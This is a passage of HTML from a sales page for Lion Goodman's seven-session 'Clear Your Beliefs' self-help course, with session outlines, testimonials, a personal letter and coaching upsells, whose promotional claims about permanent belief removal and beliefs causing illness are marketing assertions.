better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" 